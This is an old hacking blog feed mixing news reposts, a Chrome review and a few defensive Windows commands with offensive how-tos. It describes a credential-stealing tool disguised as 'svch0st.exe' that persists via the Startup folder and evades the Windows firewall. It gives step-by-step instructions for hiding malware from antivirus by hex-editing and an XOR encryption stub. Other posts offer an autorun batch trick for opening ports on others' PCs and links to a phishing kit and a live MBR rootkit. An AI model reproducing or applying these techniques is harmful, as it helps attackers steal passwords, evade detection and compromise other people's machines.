.:[ Dark Computing ]:.

HAWALA: THE FINE

noreply@blogger.com (Unknown) — Mon, 21 Feb 2011 15:54:00 +0000

Black money is the curse of India shining. A dummy’s guide to informal banking

Source: Times Of India

When the Directorate of Revenue Intelligence (DRI) detained Pakistani singer Rahat Fateh Ali Khan for allegedly carrying a huge amount of undeclared foreign exchange, it created “disorder” in India’s well-ordered hawala world. For years, hawala has been the preferred choice of traders, industrialists, criminals, drug lords and politicians. This is how they stash unaccounted currency in safe havens or conceal a tainted money trail. Deals are sealed cutting across continents, in cash, and no financial records are maintained. The operation is based on trust and is considered foolproof.

Khan’s detention has now put the spotlight on the hawala trail. In the last week, at least half-a-dozen Mumbai dealers were raided by revenue intelligence sleuths; more than Rs 60 lakh has been confiscated. Many traders have changed their phone numbers and gone underground.
According to informal Enforcement Directorate estimates “at least 500 hawala dealers are operating in Delhi alone with a similar number in Mumbai, followed by Kolkata, Chennai and Hyderabad — which are significant among cities emerging as major business centres in the country.”
In fact, many believe that with its large transaction values and ability to transfer money rapidly, the hawala network is more widespread than India’s formal financial system. The magnitude of transactions could put some of the world’s biggest banks to shame. The monthly transactions executed by Delhi’s roughly 500 hawala operators is believed to be somewhere around Rs 30,000 crore or Rs 3,60,000 crore per annum. That’s almost as much as the government’s total direct tax collection in 2009-10 or nearly 6% of the country’s GDP that year. And that hypothetical calculation is only for Delhi!
Till a few years ago, New Delhi was the major centre for political hawala deals. But the presence of a multitude of enforcement agencies, forced them to move base to Kolkata. The quantum of money transferred from political bribes can be gauged from the fact that two of every 10 hawala operators are busy helping politicians stash away their ill-gotten wealth.
Whilst on the trail of two such major kickbacks, income tax officials recently discovered Savage Island in New Zealand. On the tiny island, they found that Indians had opened banks with relatively small amounts of capital — sometimes, just Rs 4.5 lakh. The purpose of these banks appeared to be clear — entering into legitimate transactions with other financial institutions across the world. One of the many trails led to a political kickback of more than Rs 7,500 crore, which arrived at one of these Indianowned banks from a tax haven. The money was moved to another bank on Savage Island; eventually both banks were shut down, ending the trail.
Another trail had a major Indian airline receiving money from a clutch of companies in Mauritius. Followed back, the trail led to a bank on Savage Island. The bank in question apparently received its last cheque from another bank on the same island. Before the bank authorities could be tracked down, both banks had ceased to exist.
It was a classic case of the vanished hawala trail. Unsurprisingly, hawala traders are enormously rich. In February 2006, an income tax investigation found that Rs 1,540 crore of unaccounted money had been stashed at the Fatehpuri branch of the Federal Bank in Delhi. Three people, sans business antecedents, were responsible for the entire transaction. These agents were estimated to earn anywhere between Rs 5 and 10 crore each, every year. A similar drive in Maharashtra and Gujarat that year unearthed more than Rs 1,000 crore without any identifiable source. The modus operandi of these hawala dealers was identical. For domestic deals, they created bogus bills and discounted bank drafts on behalf of traders who dealt in cash. Or, they gave loans to industrialists in return for cash, charging them a commission of 1% of the total transaction. In offshore deals, money was delivered to people named by the beneficiary at any location in the world. The commission was a maximum of 2%.
Domestic hawala is small change compared to the big sums that politicians put away offshore. A big chunk of this money is received in tax havens such as the Isle of Man, British Virgin Islands, Switzerland, Dubai etc. The Central Board of Direct Taxes recently concluded a Tax Information Exchange Agreement with at least four offshore jurisdictions famous as tax havens — the Virgin Islands, Isle of Man, Bermuda and the Bahamas. It is trying to sign a similar agreement with 20 others.

ReIgniting the War of the Browsers

noreply@blogger.com (Unknown) — Thu, 04 Sep 2008 07:22:00 +0000

With a new web browser entering the Internet Scene : Google Chrome and with Microsoft being already ready with Internet Explorer 8 Beta 2 the scene is definitely getting hot.Very soon both Firefox and Chrome would be ported for mobile devices as well.Both IE 8 and Google Chrome provide with Private browsing.Google calls it as Incognito mode.IE 8 auto deletes cookies and Temporary Internet Files as soon as you leave the Private Browsing mode.

Google Chrome version 0.2.149.27

First View :

1 ] Looks very feminine

2 ] Fast and Quick

3 ] Private Browsing - Incognito Pages

4 ] Has an advanced Gogole Chrome Task manager and memory statistics (about:memory)

5 ] Good view-source:http://www.hp.com/ (View Source Option) with line numbers

6 ] Doesn't save webpages (full) as .mht but saves it like the legacy IE way.

7 ] Has chrome-source (Inspect Element) option to examine every component on the page

8 ] Keeps on contacting im-YY-fXXX.google.com where X = some number and YY = country Short Prefix eg. im-uk-f123.google.com

9 ] On every GET request the User-Agent sent is

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.13 (KHTML, like Gecko) Chrome/0.2.149.27 Safari/525.1

10] Has stolen "Duplicate Tab" option from opera but doesn't duplicate in the same window, instead opens a new Window

11] Lacks a good Full Screen View Option

There are already 2 publically disclosed bugs available to test for Chrome:

Google Chrome Browser Automatic File Download -

http://www.milw0rm.com/exploits/6355

And Google Chrome Crashes with All Tabs -

http://evilfingers.com/advisory/google_chrome_poc.php

Google Chrome is available at :

http://www.google.com/chrome

Microsoft Internet Explorer Beta 2 is available at :

http://www.microsoft.com/windows/internet-explorer/beta/

http://www.microsoft.com/windows/internet-explorer/beta/worldwide-sites.aspx

Take your Pick !

cr3d1t : q4k3rd00m3r

Evilgrade - What Next ?

noreply@blogger.com (mango) — Tue, 29 Jul 2008 11:49:00 +0000

Francisco Amato of Infobyte Security Research just announced ISR-evilgrade v1.0.0, a toolkit for exploiting products which perform online updates in an insecure fashion. This tool works in conjunction with man-in-the-middle techniques (DNS, ARP, DHCP, etc) to exploit a wide variety applications. The demonstration video uses the CAU/Metasploit DNS exploit in conjunction with the Sun Java update mechanism to execute code on a fully patched Windows machine. For more information, see the README and slide deck. The first release includes exploits for Sun Java, Winzip, Winamp, Mac OS X, OpenOffice, iTunes, Linkedin Toolbar, DAP, Notepad++, and Speedbit

http://www.infobyte.com.ar/developments.htm
http://www.infobyte.com.ar/down/isr-evilgrade-Readme.txt

==== Google Talk and Password Saving Feature's Security ====

noreply@blogger.com (Unknown) — Wed, 18 Jun 2008 04:25:00 +0000

Do you save Passwords ?

This is a WRITEUP about Google Talk Application and its Password Saving facility.
Tested on Google Talk 1.0.0.104 GTalk when set to save password, hashes and stores it like any other application for convenience but in a very secured manner.

I've developed a small application (Client-Server) which when executed by the target sends you its login name and hashed (/ encrypted) password string.When successfully dropped into and executed from C:\Documents and Settings\All Users\Start Menu\Programs\Startup\ the application tricks Windows Firewall and doesn't ask with the unblock / cancel popup box.

The application running on the attacker's end will obtain the hash sent to it and will display the hash string on its side. The attacker can then replace/create his password hash with the target's hash.After this, when the attacker launches Google Talk we expect the (asterisked) password to be the same as the target's.
A password unhider tool can now aide the attacker to reveal (unmask) what the actual password of the target is.

[ Demonstration ]

Save svch0st.exe(attached) to C:\Documents and Settings\All Users\Start Menu\Programs\Startup
Execute CollectGTPass.exe(attached)
- CollectGTPass.exe opens port 2803 on Localhost and will wait for signal from its Target/s (In our case the Target will connect to 127.0.0.1 since the Client and Server both are running on 127.0.0.1, locally) Note that the The target IP and Attacker Connection IP have been hardcoded in the exe since this is not a malware (trojan-tool) for everyone and is just for demonstration purpose.
- In the demonstration video(attached) XP Firewall prompted for the CollectGTPass.exe (GPWS2.exe) and the application has been unblocked in the XP Firewall now.
- When you will test this, Firewall won't popup any alert since the Target is connecting to loopback. In remote scenario, to avoid the alert svch0st.exe adds itself in List of AuthorisedApplications residing in HKLM before trying to connect remotely (Successfully Tested as shown in Video)
- Execute svch0st.exe
- svch0st.exe sends the encrypted password to Target:2803
- CollectGTPass.exe will now receive the encrypted Password and will wait for the next one.
- CollectGTPass waits forever to collect more password hashes from other sources.
- This tool has been successfully tested to obtain a target's hash remotely both in a local network as well as over public IPs.
- Screenshots and a Video of a successful local and remote respective retrieval attempt are attached.

[ Question ]
So does it work ? Do we get the Target's Password ?
[ Answer ]
NO !!
We get the hash and using a password unmasking tool we view the password.
But the hashing algorithm is still unknown to me.
[ Moral of the Story ]
Don't save passwords. Everything isn't GTalk.

[ What's Next ? ]
Skype.
Video..>http://senduit.com/96f520

.:credit:. .=.QuakerD00mer.=.

Built-in Windows commands to determine if a system has been hacked

noreply@blogger.com (Unknown) — Tue, 03 Jun 2008 12:53:00 +0000

1) WMIC: A world of adventure awaits

C:\> wmic process
C:\> wmic process list brief
C:\> wmic process list full
C:\> wmic startup list full
C:\> wmic process list brief /every:1
Hitting CTRL+C will stop the cycle.

2) The net command: An oldie but a goodie

3) Openfiles: Deep scrutiny

C:\> openfiles /local on
C:\> openfiles /query /v
C:\> openfiles /local off

4) Netstat: Show me the network

C:\> netstat -nao
C:\> netstat –s –p icmp
C:\> netstat –na 2

5) Find: Searching output for useful stuff

C:\> wmic process list brief /every:1 | find "cmd.exe"
C:\> wmic startup list brief | find /i "hklm"

Researching output

With these five tools, users can get a great deal of information about the configuration and security state of a Windows machine. To use each command in identifying a compromise, however, a user needs to compare the current settings of the machine under analysis to a "normal," uninfected machine.
For detailed use of the commands and interpreting outputs read this

Pen_Testing_Tools.xls

noreply@blogger.com (mango) — Fri, 30 May 2008 10:30:00 +0000

One of the bigger challenges for anyone getting into penetration testing is the amount of tools available and their purpose in the overall penetration test.This excel sheet was the first step for me to get to know and understand the tools available for penetration testers. Each tools is grouped, ordered and rated (based on my own personal rating). This excel sheet also lists the website to download the tool and which OS/environment the tool runs under.The PenTools.xls file can be downloaded from the URL below, and is approximately 40KB
http://www.shanedevane.net/PenTools.xls

Taken from: www.governmentsecurity.org

Manual Patching of Malware Binaries

noreply@blogger.com (mango) — Wed, 28 May 2008 05:47:00 +0000

The basic idea behind malware patching is to make it undetectable to anti-virus softwares.Remember that an antivirus signature is nothing but a specific value at a specific address.

Signature = Value x Address

So if we are able to change either the value or the address or a combination of both, we would sucessfully bypass most of the anti-viruses (i am talking about the regular AV's not the one's with the Heuristic Scanning capabilities).This technique has been around for quite some time now and can be divided into two methods

A) Hex editing the malware binary (Alter the value)

Signature = Value x Address

This would involve opening the binary in a hex editor and then trying to find the signature.Assuming that we have the signature present in the bottom half of the binary we open up the binary in a hex editor,scroll to the middle (note the address)then fill the remaining bytes with zero.Now save the binary as top.exe.Again open the orignal binary and fill the upper half with zeroes and save it as bottom.exe.Now scan both halves and you will have the anti-virus triggering at the bottom.exe.Repeat the same procedure with bottom.exe till you are able to locate the signature.Alter the values that are triggering the AV and you have your binary undetected.Repeat the procedure for multiple AV's.You mite have guessed that not only is the procedure time consuming but there is a high probability that you will tender your binary useless.

B) Manual patching of the malware binary (Alter the address)

First let us have a look at the basics of XOR

If A XOR B = c
Then C XOR B = A

Open the bianry in Olly and you will find that it takes you straight to the entry point(EP).An entry point is the first instruction that a processor will execute once you run the binary.Now if there was some way for us to encrypt the bnary contents so that they are undetectable to the AV and at the same time can be understood by the processor we would achieve our goal.I assume you have a functional knowledge of Olly.This can be done as

Assumptions

EP is at address 467EB6
The last instruction is at 567EB6

Copy the first few instructions after the EP to a notepad
Execute a jump to the Encryption routine
Note the EP address
scroll to the bottom of the code until you find an empty space for your code
Now put an encryption routine here

667EB6

MOV EAX, 467EB7 (i.e we start encrypting from the 'Address of EP + 1'
XOR BYTE PTR[EAX,0B] (XOR the contents for of the address with a 'key' '0B')
INC EAX
CMP EAX, 567EB7 (End of the Address)
JNZ 667EB6 (IF not reachd the end then jump to start)

Now run the exexutable and copy changes to the executable.Now we have something that is like

A ( Orignal Malware in our case) XOR B (key '0B' in our case) = C (Encrypted Malware Binary)

Now try scanning the file with the AV and you will find the file is no longer detected by the AV.When you run the file again the encryption routine will run agin.

C (Encrypted Malware Binary) XOR B (key '0B' in our case) = A (Orignal Malware Code)

This will be decrypted in memory and the malware will go unnoticed, some will detect it in the memory as well(Rem i am only talking about the regular AV's ). I will be doing a video tut on this soon.

Hello

noreply@blogger.com (mango) — Mon, 19 May 2008 10:39:00 +0000

Hey people i am back again.For the past few days i have literally been living under a rock with no internet access.I hope to start posting tuts on manual patching of malware binaries and buffer overflows.

Goolag Scanner, a webauditing tool

noreply@blogger.com (mango) — Sun, 02 Mar 2008 06:28:00 +0000

LUBBOCK, TX, February 20th -- Today CULT OF THE DEAD COW (cDc), the world'smost attractive hacker group, announced the release of Goolag Scanner, a webauditing tool. Goolag Scanner enables everyone to audit his or her own website via Google. The scanner technology is based on "Google hacking," a formof vulnerability research developed by Johnny I Hack Stuff. He's a lovelyfellow. Go buy him a drink.

"It's no big secret that the Web is the platform," said cDc spokesmodelOxblood Ruffin. "And this platform pretty much sucks from a securityperspective. Goolag Scanner provides one more tool for web site owners topatch up their online properties. We've seen some pretty scary holes throughrandom tests with the scanner in North America, Europe, and the Middle East.If I were a government, a large corporation, or anyone with a large web site,I'd be downloading this beast and aiming it at my site yesterday. The vulnerabilities are that serious."

Goolag Scanner will be released open source under the GNU Affero GeneralPublic license. It is dedicated to the memory of Wau Holland, founder of theChaos Computer Club, and a true champion of privacy rights and social justice.

GOOLAG SCANNER FUNCTIONS AND FEATURES

Goolag Scanner is a standalone windows GUI based application. It uses onexml-based configuration file for its settings. All dorks coming with thedistribution of gS are kept inside one file.

http://www.goolag.org/

http://www.goolag.org/download.html#exe

Cold Boot Attacks on Encryption Keys

noreply@blogger.com (mango) — Fri, 29 Feb 2008 05:01:00 +0000

Abstract : Contrary to popular assumption, DRAMs used in most modern computers retain their contents for seconds to minutes after power is lost, even at operating temperatures and even if removed from a motherboard. Although DRAMs become less reliable when they are not refreshed, they are not immediately erased, and their contents persist sufficiently for malicious (or forensic) acquisition of usable full-system memory images.

These guys have come up with a new and interesting type of attack to recover the encryption keys from the DRAM.
http://citp.princeton.edu/memory/

Fun with Windows Firewall

noreply@blogger.com (mango) — Thu, 07 Feb 2008 21:21:00 +0000

This goes out to all the guys out there who solely depend on windows firewall

c:>copy con disable.bat
netsh firewall set opmode disable
^z --> this is cntrl+z.Then hit enter

c:>copy con enable.bat
netsh firewall set opmode enable
^z

A neat way would be open up specific ports on the firewall

c:>copy con openport.bat
netsh firewall add portopening TCP 80 websrver
^Z

To close the port replace add by delete

Now the fun part create an autorun file that would automatically run the bat file and open the port for you

c:>copy con autorun.inf
[autorun]
action=Run
shellexecute=openport.bat

Now burn a CD with the autorun.inf and the openport.bat file or put them on your USB drive and have fun opening ports on your friends PC

A Zone transfer Script

noreply@blogger.com (mango) — Tue, 29 Jan 2008 05:09:00 +0000

If you are unfamiliar with the term Zone Transfer, I would strongly recommend some googling around a bit to find out more.A nice place to start would be Wikipedia
http://en.wikipedia.org/wiki/DNS_zone_transfer. In a nutshell a Zonetransfer is the act of database replication between a primary and a secondary DNS server.This Zone transfer should strictly occur between two trusted/related DNS servers.However due to misconfiguration of the server,anyone (read untrusted entity)asking for a copy of the DNS server zone would receive one.
##########################################

#!/bin/bash
#save as zonetransfer.sh
#chmod +x to make it executable
if [ $# -eq 0 ]
then
echo "A Zone Transfer script"
echo "Usage:./zonetransfer.sh domain name "
exit 0
fi

for nameserver in $(host -t ns $1 |cut -d" " -f4)
do
host -l $1 $nameserver|grep "has address"
done

##########################################

The Hackers CookBook v 4.51

noreply@blogger.com (mango) — Tue, 15 Jan 2008 02:16:00 +0000

An excellent book by SensePost , recommended read.
Get it here - http://rapidshare.com/files/37985858/Hackers_cookbook.rar

Tutorial - Create any Pishing Page

noreply@blogger.com (mango) — Sun, 13 Jan 2008 07:41:00 +0000

This is my first video tutorial ( so you will find me fumbling with the camtesia controls) that will teach you to create a rapidshare phishing page or a matter of fact any phishing page.It will teach you to setup a local server to test/configure the page for redirections and logging.

The tutorial can be found here (With the tools required) - http://rapidshare.com/files/64791243/fishing_tut.rar

The complete rapidshare pishinhg pack can be found here - http://rapidshare.com/files/63672519/Rapidshare_Fishing__Pack.rar

Using Printers to Stash and Serve Large Files

noreply@blogger.com (mango) — Sun, 13 Jan 2008 07:31:00 +0000

I have to say I have not had this much fun with Google for a while! It's just plain crazy seeing what people have stashed away in their web sites. A simple crafted query can turn up some pretty interesting things. I am not going to be writing about how to find files, eBooks, movies etc for the queries are pretty much there on the web. The new interesting thing printers and cams.

A very interesting thing to notice is that the Hewlett-Packard LaserJet 4100 MFP and some other HP printers that I connected to have a 20GB hard drive, which makes for a great place to hide and serve large files.

Read More - http://rapidshare.com/files/80261496/A_Simple_Search.rar

The MBR Rootkit

noreply@blogger.com (mango) — Sun, 13 Jan 2008 07:27:00 +0000

A new family of malicious software that runs before Windows even boots up has infected thousands of PCs worldwide and remains undetected by virtually all of the commercial anti-virus tools, security experts warn.

The newly-discovered rootkit, hides its files in the "master boot record" (MBR), one of the deepest recesses of the PC's hard drive. The MBR is the place PCs consult after first being turned on to see where to find a bootable operating system.

As it happens, the method used by the malware to write itself to the Windows MBR has been known for several years now: Many of its features and infection methods were detailed in a proof-of-concept paper presented by researchers from eEye Digital Security in 2005 at the annual Black Hat hacker convention in Las Vegas. Last week, a rootkit that built on the methods described in the eEye paper was discovered "in the wild" and documented in a write-up by the folks behind GMER, one of the few anti-rootkit applications that successfully detects and removes this particular rootkit.

Known as Trojan.Mebroot(by symantec), it is finding its way onto PCs through drive-by downloads, the attackers' old standby infection method. Once it's on a machine, the Trojan overwrites the MBR (master boot record) to ensure that it's loaded at startup. It also installs a custom backdoor.The main problem is that some versions of Microsoft Windows allow programs to overwrite disk sectors directly (including the MBR) from user mode, without restrictions. As such, writing a new MBR into Sector 0 as a standard user is a relatively easy task.

Nothing like starting the year off with a nasty little Trojan. Good times

The rootkit can be found here - http://rapidshare.com/files/83013949/Rootkit_MBR.rar

The Neosploit Toolkit

noreply@blogger.com (mango) — Sun, 13 Jan 2008 07:00:00 +0000

The Neosploit toolkit is an advanced exploit framework to compromise web site visitors. It was written by "grabarz". It is unknown if this is a group or an individual. There's some information which suggests it is an individual.

It's not as popular as the Mpack toolkit but is gaining popularity steadily. It was written in the C language and is used as a CGI script. It can support multiple users from the same script. The exploit code will be the same from all users but the delivered executables can be different.

Similar to other toolkits this one provide various statistics too. Instead of using a database as the means to store them Neosploit uses several files with specific internal structures. The following information about the visitor is logged: Operating System, Web browser and its version, IP address, and the Referer.

Delivered exploit code is obfuscated using custom Javascript decoding function. The function name and all local variables are random in order to avoid detection by Network IDS. Often, several layers of obfuscation with anti-decoding tricks are used to deter the faint-hearted.

Toolkit's URL scheme is designed in such a way which will prohibit thecurious of obtaining the executables even if the same one is used from previous exploits.

Perhaps the reason for its slow adoption is its high price. It ranges, depending on version, from $1500 to $3000. Common version seen today in the wild is 1.5.x, with 2.0.x in beta mode. First detected version was 1.0.x early this year.

Unfortunately i dont have the kit to share with you guys.Will be uploading here asap.